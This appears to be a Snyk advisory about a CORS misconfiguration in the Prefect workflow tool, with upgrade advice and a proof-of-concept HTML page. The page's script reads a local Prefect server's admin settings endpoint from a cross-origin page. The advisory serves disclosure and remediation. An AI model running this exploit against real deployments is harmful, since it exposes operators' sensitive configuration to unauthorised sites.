Snyk has a proof-of-concept or detailed explanation of how to exploit this vulnerability.
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applicationsUpgrade prefect
to version 2.20.17, 3.0.3 or higher.
prefect is a Prefect is a new workflow management system, designed for modern infrastructure and powered by the open-source Prefect Core workflow engine. Users organize Tasks into Flows, and Prefect takes care of the rest.
Affected versions of this package are vulnerable to Origin Validation Error due to a misconfiguration in the handling of CORS policies. An attacker can access sensitive data and potentially disrupt services by sending requests from unauthorized domains.
cors.html
on attacker server:<!DOCTYPE html>
<html>
<head>
<title>CORS PoC</title>
</head>
<body>
<h1>CORS PoC</h1>
<script>
fetch('http://127.0.0.1:4200/api/admin/settings', {
method: 'GET',
headers: {
'Origin': 'http://malicious-site.com'
}
})
.then(response => response.text()) // Convert the response to text
.then(data => {
alert('CORS PoC Response:\n' + data); // Alert the entire response
})
.catch(error => {
alert('CORS PoC Error:\n' + error); // Alert any error that occurs
});
</script>
</body>
</html>